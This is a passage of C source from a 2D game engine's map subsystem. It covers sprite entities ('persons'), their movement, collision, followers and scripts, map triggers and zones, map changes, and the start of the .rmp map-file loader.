struct map_tile* tilemap;
struct map_trigger* trigger;
struct map_zone* zone;
int x, y, i;
old_width = s_map->layers[layer].width;
old_height = s_map->layers[layer].height;
// allocate a new tilemap and copy the old layer tiles into it. we can't simply realloc
// because the tilemap is a 2D array.
if (!(tilemap = malloc(x_size * y_size * sizeof(struct map_tile))))
return false;
for (x = 0; x < x_size; ++x) {
for (y = 0; y < y_size; ++y) {
if (x < old_width && y < old_height) {
tilemap[x + y * x_size] = s_map->layers[layer].tilemap[x + y * old_width];
}
else {
tile = &tilemap[x + y * x_size];
tile->frames_left = tileset_get_delay(s_map->tileset, 0);
tile->tile_index = 0;
}
}
}
// free the old tilemap and substitute the new one
free(s_map->layers[layer].tilemap);
s_map->layers[layer].tilemap = tilemap;
s_map->layers[layer].width = x_size;
s_map->layers[layer].height = y_size;
// if we resize the largest layer, the overall map size will change.
// recalcuate it.
tileset_get_size(s_map->tileset, &tile_width, &tile_height);
s_map->width = 0;
s_map->height = 0;
for (i = 0; i < s_map->num_layers; ++i) {
if (!s_map->layers[i].is_parallax) {
s_map->width = fmax(s_map->width, s_map->layers[i].width * tile_width);
s_map->height = fmax(s_map->height, s_map->layers[i].height * tile_height);
}
}
// ensure zones and triggers remain in-bounds. if any are completely
// out-of-bounds, delete them.
for (i = (int)vector_len(s_map->zones) - 1; i >= 0; --i) {
zone = vector_get(s_map->zones, i);
if (zone->bounds.x1 >= s_map->width || zone->bounds.y1 >= s_map->height)
vector_remove(s_map->zones, i);
else {
if (zone->bounds.x2 > s_map->width)
zone->bounds.x2 = s_map->width;
if (zone->bounds.y2 > s_map->height)
zone->bounds.y2 = s_map->height;
}
}
for (i = (int)vector_len(s_map->triggers) - 1; i >= 0; --i) {
trigger = vector_get(s_map->triggers, i);
if (trigger->x >= s_map->width || trigger->y >= s_map->height)
vector_remove(s_map->triggers, i);
}
return true;
}
person_t*
person_new(const char* name, spriteset_t* spriteset, bool is_persistent, script_t* create_script)
{
point3_t origin = map_origin();
person_t* person;
if (++s_num_persons > s_max_persons) {
s_max_persons = s_num_persons * 2;
s_persons = realloc(s_persons, s_max_persons * sizeof(person_t*));
}
person = s_persons[s_num_persons - 1] = calloc(1, sizeof(person_t));
person->id = s_next_person_id++;
person->sprite = spriteset_ref(spriteset);
set_person_name(person, name);
person_set_pose(person, spriteset_pose_name(spriteset, 0));
person->is_persistent = is_persistent;
person->is_visible = true;
person->x = origin.x;
person->y = origin.y;
person->layer = origin.z;
person->speed_x = 1.0;
person->speed_y = 1.0;
person->anim_frames = spriteset_frame_delay(person->sprite, person->direction, 0);
person->mask = mk_color(255, 255, 255, 255);
person->scale_x = person->scale_y = 1.0;
person->scripts[PERSON_SCRIPT_ON_CREATE] = create_script;
person_activate(person, PERSON_SCRIPT_ON_CREATE, NULL, true);
sort_persons();
return person;
}
void
person_free(person_t* person)
{
int i, j;
// call the person's destroy script *before* renouncing leadership.
// the destroy script may want to reassign followers (they will be orphaned otherwise), so
// we want to give it a chance to do so.
person_activate(person, PERSON_SCRIPT_ON_DESTROY, NULL, true);
for (i = 0; i < s_num_persons; ++i) {
if (s_persons[i]->leader == person)
s_persons[i]->leader = NULL;
}
// remove the person from the engine
detach_person(person);
for (i = 0; i < s_num_persons; ++i) {
if (s_persons[i] == person) {
for (j = i; j < s_num_persons - 1; ++j)
s_persons[j] = s_persons[j + 1];
--s_num_persons;
--i;
}
}
vector_free(person->ignore_list);
free_person(person);
sort_persons();
}
rect_t
person_base(const person_t* person)
{
rect_t base_rect;
int base_x;
int base_y;
double x;
double y;
base_rect = rect_zoom(spriteset_get_base(person->sprite), person->scale_x, person->scale_y);
person_get_xy(person, &x, &y, true);
base_x = x - (base_rect.x1 + (base_rect.x2 - base_rect.x1) / 2);
base_y = y - (base_rect.y1 + (base_rect.y2 - base_rect.y1) / 2);
base_rect.x1 += base_x; base_rect.x2 += base_x;
base_rect.y1 += base_y; base_rect.y2 += base_y;
return base_rect;
}
bool
person_following(const person_t* person, const person_t* leader)
{
const person_t* node;
node = person;
while ((node = node->leader))
if (node == leader) return true;
return false;
}
bool
person_has_moved(const person_t* person)
{
return person->mv_x != 0 || person->mv_y != 0;
}
vector_t*
person_ignore_list(person_t* person)
{
// note: the returned vector is an array of C strings. these should be treated
// as const char*; in other words, don't free them!
int i;
if (person->ignore_list == NULL)
person->ignore_list = vector_new(sizeof(const char*));
vector_clear(person->ignore_list);
for (i = 0; i < person->num_ignores; ++i)
vector_push(person->ignore_list, &person->ignores[i]);
return person->ignore_list;
}
bool
person_ignored_by(const person_t* person, const person_t* other)
{
// note: commutative; if either person ignores the other, the function will return true
int i;
if (other->ignore_all_persons || person->ignore_all_persons)
return true;
for (i = 0; i < other->num_ignores; ++i)
if (strcmp(other->ignores[i], person->name) == 0) return true;
for (i = 0; i < person->num_ignores; ++i)
if (strcmp(person->ignores[i], other->name) == 0) return true;
return false;
}
bool
person_moving(const person_t* person)
{
return person->num_commands > 0;
}
const char*
person_name(const person_t* person)
{
return person != NULL ? person->name : "";
}
bool
person_obstructed_at(const person_t* person, double x, double y, person_t** out_obstructing_person, int* out_tile_index)
{
rect_t area;
rect_t base, my_base;
double cur_x, cur_y;
bool is_obstructed = false;
int layer;
const obsmap_t* obsmap;
int tile_w, tile_h;
const tileset_t* tileset;
int i, i_x, i_y;
map_normalize_xy(&x, &y, person->layer);
person_get_xyz(person, &cur_x, &cur_y, &layer, true);
my_base = rect_translate(person_base(person), x - cur_x, y - cur_y);
if (out_obstructing_person != NULL)
*out_obstructing_person = NULL;
if (out_tile_index != NULL)
*out_tile_index = -1;
// check for obstructing persons
if (!person->ignore_all_persons) {
for (i = 0; i < s_num_persons; ++i) {
if (s_persons[i] == person) // these persons aren't going to obstruct themselves!
continue;
if (s_persons[i]->layer != layer)
continue; // ignore persons not on the same layer
if (person_following(s_persons[i], person))
continue; // ignore own followers
base = person_base(s_persons[i]);
if (do_rects_overlap(my_base, base) && !person_ignored_by(person, s_persons[i])) {
is_obstructed = true;
if (out_obstructing_person)
*out_obstructing_person = s_persons[i];
break;
}
}
}
// no obstructing person, check map-defined obstructions
obsmap = layer_obsmap(layer);
if (obsmap_test_rect(obsmap, my_base))
is_obstructed = true;
// check for obstructing tiles
// for performance reasons, the search is constrained to the immediate vicinity
// of the person's sprite base.
if (!person->ignore_all_tiles) {
tileset = map_tileset();
tileset_get_size(tileset, &tile_w, &tile_h);
area.x1 = my_base.x1 / tile_w;
area.y1 = my_base.y1 / tile_h;
area.x2 = area.x1 + (my_base.x2 - my_base.x1) / tile_w + 2;
area.y2 = area.y1 + (my_base.y2 - my_base.y1) / tile_h + 2;
for (i_x = area.x1; i_x < area.x2; ++i_x) for (i_y = area.y1; i_y < area.y2; ++i_y) {
base = rect_translate(my_base, -(i_x * tile_w), -(i_y * tile_h));
obsmap = tileset_obsmap(tileset, map_tile_at(i_x, i_y, layer));
if (obsmap != NULL && obsmap_test_rect(obsmap, base)) {
is_obstructed = true;
if (out_tile_index)
*out_tile_index = map_tile_at(i_x, i_y, layer);
break;
}
}
}
return is_obstructed;
}
double
person_get_angle(const person_t* person)
{
return person->theta;
}
color_t
person_get_color(const person_t* person)
{
return person->mask;
}
int
person_get_frame(const person_t* person)
{
int num_frames;
num_frames = spriteset_num_frames(person->sprite, person->direction);
return person->frame % num_frames;
}
int
person_get_frame_delay(const person_t* person)
{
return person->anim_frames;
}
bool
person_get_ignore_persons(const person_t* person)
{
return person->ignore_all_persons;
}
bool
person_get_ignore_tiles(const person_t* person)
{
return person->ignore_all_tiles;
}
int
person_get_layer(const person_t* person)
{
return person->layer;
}
person_t*
person_get_leader(const person_t* person)
{
return person->leader;
}
point2_t
person_get_offset(const person_t* person)
{
return mk_point2(person->x_offset, person->y_offset);
}
const char*
person_get_pose(const person_t* person)
{
return person->direction;
}
int
person_get_revert_delay(const person_t* person)
{
return person->revert_delay;
}
void
person_get_scale(const person_t* person, double* out_scale_x, double* out_scale_y)
{
*out_scale_x = person->scale_x;
*out_scale_y = person->scale_y;
}
void
person_get_speed(const person_t* person, double* out_x_speed, double* out_y_speed)
{
if (out_x_speed) *out_x_speed = person->speed_x;
if (out_y_speed) *out_y_speed = person->speed_y;
}
spriteset_t*
person_get_spriteset(const person_t* person)
{
return person->sprite;
}
int
person_get_trailing(const person_t* person)
{
return person->follow_distance;
}
bool
person_get_visible(const person_t* person)
{
return person->is_visible;
}
void
person_get_xy(const person_t* person, double* out_x, double* out_y, bool normalize)
{
*out_x = person->x;
*out_y = person->y;
if (normalize)
map_normalize_xy(out_x, out_y, person->layer);
}
void
person_get_xyz(const person_t* person, double* out_x, double* out_y, int* out_layer, bool normalize)
{
*out_x = person->x;
*out_y = person->y;
*out_layer = person->layer;
if (normalize)
map_normalize_xy(out_x, out_y, *out_layer);
}
void
person_set_angle(person_t* person, double theta)
{
person->theta = theta;
}
void
person_set_color(person_t* person, color_t mask)
{
person->mask = mask;
}
void
person_set_frame(person_t* person, int frame_index)
{
int num_frames;
num_frames = spriteset_num_frames(person->sprite, person->direction);
person->frame = (frame_index % num_frames + num_frames) % num_frames;
person->anim_frames = spriteset_frame_delay(person->sprite, person->direction, person->frame);
person->revert_frames = person->revert_delay;
}
void
person_set_frame_delay(person_t* person, int num_frames)
{
person->anim_frames = num_frames;
person->revert_frames = person->revert_delay;
}
void
person_set_ignore_persons(person_t* person, bool ignoring)
{
person->ignore_all_persons = ignoring;
}
void
person_set_ignore_tiles (person_t* person, bool ignoring)
{
person->ignore_all_tiles = ignoring;
}
void
person_set_layer(person_t* person, int layer)
{
person->layer = layer;
}
bool
person_set_leader(person_t* person, person_t* leader, int distance)
{
const person_t* node;
// prevent circular follower chains from forming
if (leader != NULL) {
node = leader;
do {
if (node == person)
return false;
} while ((node = node->leader));
}
// add the person as a follower (or sever existing link if leader==NULL)
if (leader != NULL) {
if (!enlarge_step_history(leader, distance))
return false;
person->leader = leader;
person->follow_distance = distance;
}
person->leader = leader;
return true;
}
void
person_set_offset(person_t* person, point2_t offset)
{
person->x_offset = offset.x;
person->y_offset = offset.y;
}
void
person_set_pose(person_t* person, const char* pose_name)
{
person->direction = realloc(person->direction, (strlen(pose_name) + 1) * sizeof(char));
strcpy(person->direction, pose_name);
}
void
person_set_revert_delay(person_t* person, int num_frames)
{
person->revert_delay = num_frames;
person->revert_frames = num_frames;
}
void
person_set_scale(person_t* person, double scale_x, double scale_y)
{
person->scale_x = scale_x;
person->scale_y = scale_y;
}
void
person_set_speed(person_t* person, double x_speed, double y_speed)
{
person->speed_x = x_speed;
person->speed_y = y_speed;
}
void
person_set_spriteset(person_t* person, spriteset_t* spriteset)
{
spriteset_t* old_spriteset;
old_spriteset = person->sprite;
person->sprite = spriteset_ref(spriteset);
person->anim_frames = spriteset_frame_delay(person->sprite, person->direction, 0);
person->frame = 0;
spriteset_unref(old_spriteset);
}
void
person_set_trailing(person_t* person, int distance)
{
enlarge_step_history(person->leader, distance);
person->follow_distance = distance;
}
void
person_set_visible(person_t* person, bool visible)
{
person->is_visible = visible;
}
void
person_set_xyz(person_t* person, double x, double y, int layer)
{
person->x = x;
person->y = y;
person->layer = layer;
sort_persons();
}
void
person_on_event(person_t* person, int type, script_t* script)
{
script_unref(person->scripts[type]);
person->scripts[type] = script;
}
void
person_activate(const person_t* person, person_op_t op, const person_t* acting_person, bool use_default)
{
const person_t* last_acting;
const person_t* last_current;
last_acting = s_acting_person;
last_current = s_current_person;
s_acting_person = acting_person;
s_current_person = person;
if (use_default)
script_run(s_def_person_scripts[op], false);
if (does_person_exist(person))
script_run(person->scripts[op], false);
s_acting_person = last_acting;
s_current_person = last_current;
}
void
person_call_default(const person_t* person, person_op_t op, const person_t* acting_person)
{
const person_t* last_acting;
const person_t* last_current;
last_acting = s_acting_person;
last_current = s_current_person;
s_acting_person = acting_person;
s_current_person = person;
script_run(s_def_person_scripts[op], false);
s_acting_person = last_acting;
s_current_person = last_current;
}
void
person_clear_ignores(person_t* person)
{
int i;
for (i = 0; i < person->num_ignores; ++i)
free(person->ignores[i]);
person->num_ignores = 0;
}
void
person_clear_queue(person_t* person)
{
person->num_commands = 0;
}
bool
person_compile_script(person_t* person, int type, const lstring_t* codestring)
{
script_t* script;
const char* script_name;
script_name = type == PERSON_SCRIPT_ON_CREATE ? "onCreate"
: type == PERSON_SCRIPT_ON_DESTROY ? "onDestroy"
: type == PERSON_SCRIPT_ON_TOUCH ? "onTouch"
: type == PERSON_SCRIPT_ON_TALK ? "onTalk"
: type == PERSON_SCRIPT_GENERATOR ? "genCommands"
: NULL;
if (script_name == NULL)
return false;
script = script_new(codestring, "%s/%s/%s.js", map_pathname(), person->name, script_name);
person_on_event(person, type, script);
return true;
}
void
person_ignore_name(person_t* person, const char* name)
{
int index;
index = person->num_ignores++;
person->ignores = realloc(person->ignores, person->num_ignores * sizeof(char*));
person->ignores[index] = strdup(name);
// ignore list changed, delete cache
vector_free(person->ignore_list);
person->ignore_list = NULL;
}
bool
person_queue_command(person_t* person, int command, bool is_immediate)
{
struct command* commands;
bool is_aok = true;
switch (command) {
case COMMAND_MOVE_NORTHEAST:
is_aok &= person_queue_command(person, COMMAND_MOVE_NORTH, true);
is_aok &= person_queue_command(person, COMMAND_MOVE_EAST, is_immediate);
return is_aok;
case COMMAND_MOVE_SOUTHEAST:
is_aok &= person_queue_command(person, COMMAND_MOVE_SOUTH, true);
is_aok &= person_queue_command(person, COMMAND_MOVE_EAST, is_immediate);
return is_aok;
case COMMAND_MOVE_SOUTHWEST:
is_aok &= person_queue_command(person, COMMAND_MOVE_SOUTH, true);
is_aok &= person_queue_command(person, COMMAND_MOVE_WEST, is_immediate);
return is_aok;
case COMMAND_MOVE_NORTHWEST:
is_aok &= person_queue_command(person, COMMAND_MOVE_NORTH, true);
is_aok &= person_queue_command(person, COMMAND_MOVE_WEST, is_immediate);
return is_aok;
default:
++person->num_commands;
if (person->num_commands > person->max_commands) {
if (!(commands = realloc(person->commands, person->num_commands * 2 * sizeof(struct command))))
return false;
person->max_commands = person->num_commands * 2;
person->commands = commands;
}
person->commands[person->num_commands - 1].type = command;
person->commands[person->num_commands - 1].is_immediate = is_immediate;
person->commands[person->num_commands - 1].script = NULL;
return true;
}
}
bool
person_queue_script(person_t* person, script_t* script, bool is_immediate)
{
++person->num_commands;
if (person->num_commands > person->max_commands) {
person->max_commands = person->num_commands * 2;
if (!(person->commands = realloc(person->commands, person->max_commands * sizeof(struct command))))
return false;
}
person->commands[person->num_commands - 1].type = COMMAND_RUN_SCRIPT;
person->commands[person->num_commands - 1].is_immediate = is_immediate;
person->commands[person->num_commands - 1].script = script;
return true;
}
void
person_talk(const person_t* person)
{
rect_t map_rect;
person_t* target_person;
double talk_x, talk_y;
map_rect = map_bounds();
// check if anyone else is within earshot
person_get_xy(person, &talk_x, &talk_y, true);
if (strstr(person->direction, "north"))
talk_y -= s_talk_distance;
if (strstr(person->direction, "east"))
talk_x += s_talk_distance;
if (strstr(person->direction, "south"))
talk_y += s_talk_distance;
if (strstr(person->direction, "west"))
talk_x -= s_talk_distance;
person_obstructed_at(person, talk_x, talk_y, &target_person, NULL);
// if so, call their talk script
if (target_person != NULL)
person_activate(target_person, PERSON_SCRIPT_ON_TALK, person, true);
}
void
trigger_get_xyz(int trigger_index, int* out_x, int* out_y, int* out_layer)
{
struct map_trigger* trigger;
trigger = vector_get(s_map->triggers, trigger_index);
if (out_x != NULL)
*out_x = trigger->x;
if (out_y != NULL)
*out_y = trigger->y;
if (out_layer) *out_layer = trigger->z;
}
void
trigger_set_layer(int trigger_index, int layer)
{
struct map_trigger* trigger;
trigger = vector_get(s_map->triggers, trigger_index);
trigger->z = layer;
}
void
trigger_set_script(int trigger_index, script_t* script)
{
script_t* old_script;
struct map_trigger* trigger;
trigger = vector_get(s_map->triggers, trigger_index);
old_script = trigger->script;
trigger->script = script_ref(script);
script_unref(old_script);
}
void
trigger_set_xy(int trigger_index, int x, int y)
{
struct map_trigger* trigger;
trigger = vector_get(s_map->triggers, trigger_index);
trigger->x = x;
trigger->y = y;
}
void
trigger_activate(int trigger_index)
{
int last_trigger;
struct map_trigger* trigger;
trigger = vector_get(s_map->triggers, trigger_index);
last_trigger = s_current_trigger;
s_current_trigger = trigger_index;
script_run(trigger->script, true);
s_current_trigger = last_trigger;
}
rect_t
zone_get_bounds(int zone_index)
{
struct map_zone* zone;
zone = vector_get(s_map->zones, zone_index);
return zone->bounds;
}
int
zone_get_layer(int zone_index)
{
struct map_zone* zone;
zone = vector_get(s_map->zones, zone_index);
return zone->layer;
}
int
zone_get_steps(int zone_index)
{
struct map_zone* zone;
zone = vector_get(s_map->zones, zone_index);
return zone->interval;
}
void
zone_set_bounds(int zone_index, rect_t bounds)
{
struct map_zone* zone;
zone = vector_get(s_map->zones, zone_index);
rect_normalize(&bounds);
zone->bounds = bounds;
}
void
zone_set_layer(int zone_index, int layer)
{
struct map_zone* zone;
zone = vector_get(s_map->zones, zone_index);
zone->layer = layer;
}
void
zone_set_script(int zone_index, script_t* script)
{
script_t* old_script;
struct map_zone* zone;
zone = vector_get(s_map->zones, zone_index);
old_script = zone->script;
zone->script = script_ref(script);
script_unref(old_script);
}
void
zone_set_steps(int zone_index, int interval)
{
struct map_zone* zone;
zone = vector_get(s_map->zones, zone_index);
zone->interval = interval;
zone->steps_left = 0;
}
void
zone_activate(int zone_index)
{
int last_zone;
struct map_zone* zone;
zone = vector_get(s_map->zones, zone_index);
last_zone = s_current_zone;
s_current_zone = zone_index;
script_run(zone->script, true);
s_current_zone = last_zone;
}
static bool
change_map(const char* filename, bool preserve_persons)
{
// note: if an error is detected during a map change, change_map() will return false, but
// the map engine may be left in an inconsistent state. it is therefore probably wise
// to consider such a situation unrecoverable.
struct map* map;
person_t* person;
struct map_person* person_info;
path_t* path;
spriteset_t* spriteset = NULL;
int i;
console_log(2, "changing current map to '%s'", filename);
map = load_map(filename);
if (map == NULL) return false;
if (s_map != NULL) {
// run map exit scripts first, before loading new map
map_activate(MAP_SCRIPT_ON_LEAVE, true);
}
// close out old map and prep for new one
free_map(s_map); free(s_map_filename);
for (i = 0; i < s_num_deferreds; ++i)
script_unref(s_deferreds[i].script);
s_num_deferreds = 0;
s_map = map; s_map_filename = strdup(filename);
reset_persons(preserve_persons);
// populate persons
for (i = 0; i < s_map->num_persons; ++i) {
person_info = &s_map->persons[i];
path = game_full_path(g_game, lstr_cstr(person_info->spriteset), "spritesets", true);
spriteset = spriteset_load(path_cstr(path));
path_free(path);
if (spriteset == NULL)
goto on_error;
if (!(person = person_new(lstr_cstr(person_info->name), spriteset, false, NULL)))
goto on_error;
spriteset_unref(spriteset);
person_set_xyz(person, person_info->x, person_info->y, person_info->z);
person_compile_script(person, PERSON_SCRIPT_ON_CREATE, person_info->create_script);
person_compile_script(person, PERSON_SCRIPT_ON_DESTROY, person_info->destroy_script);
person_compile_script(person, PERSON_SCRIPT_ON_TOUCH, person_info->touch_script);
person_compile_script(person, PERSON_SCRIPT_ON_TALK, person_info->talk_script);
person_compile_script(person, PERSON_SCRIPT_GENERATOR, person_info->command_script);
// normally this is handled by person_new(), but since in this case the
// person-specific create script isn't compiled until after the person is created,
// the map engine gets the responsibility.
person_activate(person, PERSON_SCRIPT_ON_CREATE, NULL, false);
}
// set camera over starting position
s_camera_x = s_map->origin.x;
s_camera_y = s_map->origin.y;
// start up map BGM (if same as previous, leave alone)
if (s_map->bgm_file == NULL && s_map_bgm_stream != NULL) {
sound_unref(s_map_bgm_stream);
lstr_free(s_last_bgm_file);
s_map_bgm_stream = NULL;
s_last_bgm_file = NULL;
}
else if (s_map->bgm_file != NULL
&& (s_last_bgm_file == NULL || lstr_cmp(s_map->bgm_file, s_last_bgm_file) != 0))
{
sound_unref(s_map_bgm_stream);
lstr_free(s_last_bgm_file);
s_last_bgm_file = lstr_dup(s_map->bgm_file);
path = game_full_path(g_game, lstr_cstr(s_map->bgm_file), "sounds", true);
if ((s_map_bgm_stream = sound_new(path_cstr(path)))) {
sound_set_repeat(s_map_bgm_stream, true);
sound_play(s_map_bgm_stream, s_bgm_mixer);
}
path_free(path);
}
// run map entry scripts
map_activate(MAP_SCRIPT_ON_ENTER, true);
s_frames = 0;
return true;
on_error:
spriteset_unref(spriteset);
free_map(s_map);
return false;
}
static void
command_person(person_t* person, int command)
{
double new_x;
double new_y;
person_t* person_to_touch;
new_x = person->x;
new_y = person->y;
switch (command) {
case COMMAND_ANIMATE:
person->revert_frames = person->revert_delay;
if (person->anim_frames > 0 && --person->anim_frames == 0) {
++person->frame;
person->anim_frames = spriteset_frame_delay(person->sprite, person->direction, person->frame);
}
break;
case COMMAND_FACE_NORTH:
person_set_pose(person, "north");
break;
case COMMAND_FACE_NORTHEAST:
person_set_pose(person, "northeast");
break;
case COMMAND_FACE_EAST:
person_set_pose(person, "east");
break;
case COMMAND_FACE_SOUTHEAST:
person_set_pose(person, "southeast");
break;
case COMMAND_FACE_SOUTH:
person_set_pose(person, "south");
break;
case COMMAND_FACE_SOUTHWEST:
person_set_pose(person, "southwest");
break;
case COMMAND_FACE_WEST:
person_set_pose(person, "west");
break;
case COMMAND_FACE_NORTHWEST:
person_set_pose(person, "northwest");
break;
case COMMAND_MOVE_NORTH:
new_y = person->y - person->speed_y;
break;
case COMMAND_MOVE_EAST:
new_x = person->x + person->speed_x;
break;
case COMMAND_MOVE_SOUTH:
new_y = person->y + person->speed_y;
break;
case COMMAND_MOVE_WEST:
new_x = person->x - person->speed_x;
break;
}
if (new_x != person->x || new_y != person->y) {
// person is trying to move, make sure the path is clear of obstructions
if (!person_obstructed_at(person, new_x, new_y, &person_to_touch, NULL)) {
if (new_x != person->x)
person->mv_x = new_x > person->x ? 1 : -1;
if (new_y != person->y)
person->mv_y = new_y > person->y ? 1 : -1;
person->x = new_x;
person->y = new_y;
}
else {
// if not, and we collided with a person, call that person's touch script
if (person_to_touch != NULL)
person_activate(person_to_touch, PERSON_SCRIPT_ON_TOUCH, person, true);
}
}
}
static int
compare_persons(const void* a, const void* b)
{
person_t* p1 = *(person_t**)a;
person_t* p2 = *(person_t**)b;
double x, y_p1, y_p2;
int y_delta;
person_get_xy(p1, &x, &y_p1, true);
person_get_xy(p2, &x, &y_p2, true);
y_delta = y_p1 - y_p2;
if (y_delta != 0)
return y_delta;
else if (person_following(p1, p2))
return -1;
else if (person_following(p2, p1))
return 1;
else
return p1->id - p2->id;
}
static void
detach_person(const person_t* person)
{
int i;
if (s_camera_person == person)
s_camera_person = NULL;
for (i = 0; i < PLAYER_MAX; ++i) {
if (s_players[i].person == person)
s_players[i].person = NULL;
}
}
static bool
does_person_exist(const person_t* person)
{
int i;
for (i = 0; i < s_num_persons; ++i)
if (person == s_persons[i]) return true;
return false;
}
void
draw_persons(int layer, bool is_flipped, int cam_x, int cam_y)
{
person_t* person;
spriteset_t* sprite;
int w, h;
double x, y;
int i;
for (i = 0; i < s_num_persons; ++i) {
person = s_persons[i];
if (!person->is_visible || person->layer != layer)
continue;
sprite = person->sprite;
w = spriteset_width(sprite);
h = spriteset_height(sprite);
person_get_xy(person, &x, &y, true);
x -= cam_x - person->x_offset;
y -= cam_y - person->y_offset;
spriteset_draw(sprite, person->mask, is_flipped, person->theta, person->scale_x, person->scale_y,
person->direction, trunc(x), trunc(y), person->frame);
}
}
static bool
enlarge_step_history(person_t* person, int new_size)
{
struct step *new_steps;
size_t pastmost;
double last_x;
double last_y;
int i;
if (new_size > person->max_history) {
if (!(new_steps = realloc(person->steps, new_size * sizeof(struct step))))
return false;
// when enlarging the history buffer, fill new slots with pastmost values
// (kind of like sign extension)
pastmost = person->max_history - 1;
last_x = person->steps != NULL ? person->steps[pastmost].x : person->x;
last_y = person->steps != NULL ? person->steps[pastmost].y : person->y;
for (i = person->max_history; i < new_size; ++i) {
new_steps[i].x = last_x;
new_steps[i].y = last_y;
}
person->steps = new_steps;
person->max_history = new_size;
}
return true;
}
static void
free_map(struct map* map)
{
struct map_trigger* trigger;
struct map_zone* zone;
iter_t iter;
int i;
if (map == NULL)
return;
for (i = 0; i < MAP_SCRIPT_MAX; ++i)
script_unref(map->scripts[i]);
for (i = 0; i < map->num_layers; ++i) {
script_unref(map->layers[i].render_script);
lstr_free(map->layers[i].name);
free(map->layers[i].tilemap);
obsmap_free(map->layers[i].obsmap);
}
for (i = 0; i < map->num_persons; ++i) {
lstr_free(map->persons[i].name);
lstr_free(map->persons[i].spriteset);
lstr_free(map->persons[i].create_script);
lstr_free(map->persons[i].destroy_script);
lstr_free(map->persons[i].command_script);
lstr_free(map->persons[i].talk_script);
lstr_free(map->persons[i].touch_script);
}
iter = vector_enum(s_map->triggers);
while ((trigger = iter_next(&iter)))
script_unref(trigger->script);
iter = vector_enum(s_map->zones);
while ((zone = iter_next(&iter)))
script_unref(zone->script);
lstr_free(s_map->bgm_file);
tileset_free(map->tileset);
free(map->layers);
free(map->persons);
vector_free(map->triggers);
vector_free(map->zones);
free(map);
}
static void
free_person(person_t* person)
{
int i;
free(person->steps);
for (i = 0; i < PERSON_SCRIPT_MAX; ++i)
script_unref(person->scripts[i]);
spriteset_unref(person->sprite);
free(person->commands);
free(person->name);
free(person->direction);
free(person);
}
static struct map_trigger*
get_trigger_at(int x, int y, int layer, int* out_index)
{
rect_t bounds;
struct map_trigger* found_item = NULL;
int tile_w, tile_h;
struct map_trigger* trigger;
iter_t iter;
tileset_get_size(s_map->tileset, &tile_w, &tile_h);
iter = vector_enum(s_map->triggers);
while ((trigger = iter_next(&iter))) {
if (trigger->z != layer && false) // layer ignored for compatibility reasons
continue;
bounds.x1 = trigger->x - tile_w / 2;
bounds.y1 = trigger->y - tile_h / 2;
bounds.x2 = bounds.x1 + tile_w;
bounds.y2 = bounds.y1 + tile_h;
if (is_point_in_rect(x, y, bounds)) {
found_item = trigger;
if (out_index != NULL)
*out_index = (int)iter.index;
break;
}
}
return found_item;
}
static struct map_zone*
get_zone_at(int x, int y, int layer, int which, int* out_index)
{
struct map_zone* found_item = NULL;
struct map_zone* zone;
iter_t iter;
int i;
iter = vector_enum(s_map->zones); i = -1;
while ((zone = iter_next(&iter))) {
if (zone->layer != layer && false) // layer ignored for compatibility
continue;
if (is_point_in_rect(x, y, zone->bounds) && which-- == 0) {
found_item = zone;
if (out_index) *out_index = (int)iter.index;
break;
}
}
return found_item;
}
static struct map*
load_map(const char* filename)
{
// strings: 0 - tileset filename
// 1 - music filename
// 2 - script filename (obsolete, not used)
// 3 - entry script
// 4 - exit script
// 5 - exit north script
// 6 - exit east script
// 7 - exit south script
// 8 - exit west script
uint16_t count;
struct rmp_entity_header entity_hdr;
file_t* file = NULL;
bool has_failed;
struct map_layer* layer;
struct rmp_layer_header layer_hdr;
struct map* map = NULL;
int num_tiles;
struct map_person* person;
struct rmp_header rmp;
lstring_t* script;
rect_t segment;
int16_t* tile_data = NULL;
path_t* tileset_path;
tileset_t* tileset;
struct map_trigger trigger;
struct map_zone zone;
struct rmp_zone_header zone_hdr;
lstring_t* *strings = NULL;
int i, j, x, y, z;
console_log(2, "constructing new map from '%s'", filename);
memset(&rmp, 0, sizeof(struct rmp_header));
if (!(file = file_open(g_game, filename, "rb")))
goto on_error;
map = calloc(1, sizeof(struct map));
if (file_read(file, &rmp, 1, sizeof(struct rmp_header)) != 1)
goto on_error;
if (memcmp(rmp.signature, ".rmp", 4) != 0) goto on_error;
if (rmp.num_strings != 3 && rmp.num_strings != 5 && rmp.num_strings < 9)
goto on_error;
if (rmp.start_layer < 0 || rmp.start_layer >= rmp.num_layers)
rmp.start_layer = 0; // being nice here, this really should fail outright
switch (rmp.version) {
case 1:
// load strings (resource filenames, scripts, etc.)
strings = calloc(rmp.num_strings, sizeof(lstring_t*));
has_failed = false;
for (i = 0; i < rmp.num_strings; ++i)
has_failed = has_failed || ((strings[i] = read_lstring(file, true)) == NULL);
if (has_failed) goto on_error;
// pre-allocate map structures
map->layers = calloc(rmp.num_layers, sizeof(struct map_layer));
map->persons = calloc(rmp.num_entities, sizeof(struct map_person));
map->triggers = vector_new(sizeof(struct map_trigger));
map->zones = vector_new(sizeof(struct map_zone));
// load layers
for (i = 0; i < rmp.num_layers; ++i) {
if (file_read(file, &layer_hdr, 1, sizeof(struct rmp_layer_header)) != 1)
goto on_error;
layer = &map->layers[i];
layer->is_parallax = (layer_hdr.flags & 2) != 0x0;
layer->is_reflective = layer_hdr.is_reflective;
layer->is_visible = (layer_hdr.flags & 1) == 0x0;
layer->color_mask = mk_color(255, 255, 255, 255);
layer->width = layer_hdr.width;
layer->height = layer_hdr.height;
layer->autoscroll_x = layer->is_parallax ? layer_hdr.scrolling_x : 0.0;
layer->autoscroll_y = layer->is_parallax ? layer_hdr.scrolling_y : 0.0;
layer->parallax_x = layer->is_parallax ? layer_hdr.parallax_x : 1.0;
layer->parallax_y = layer->is_parallax ? layer_hdr.parallax_y : 1.0;
if (!layer->is_parallax) {
map->width = fmax(map->width, layer->width);
map->height = fmax(map->height, layer->height);
}
if (!(layer->tilemap = malloc(layer_hdr.width * layer_hdr.height * sizeof(struct map_tile))))
goto on_error;
layer->name = read_lstring(file, true);
layer->obsmap = obsmap_new();
num_tiles = layer_hdr.width * layer_hdr.height;
if ((tile_data = malloc(num_tiles * 2)) == NULL)
goto on_error;
if (file_read(file, tile_data, num_tiles, 2) != num_tiles)
goto on_error;
for (j = 0; j < num_tiles; ++j)
layer->tilemap[j].tile_index = tile_data[j];
for (j = 0; j < layer_hdr.num_segments; ++j) {
if (!fread_rect32(file, &segment)) goto on_error;
obsmap_add_line(layer->obsmap, segment);
}
free(tile_data);
tile_data = NULL;
}
// if either dimension is zero, the map has no non-parallax layers and is thus malformed
if (map->width == 0 || map->height == 0)
goto on_error;
// load entities
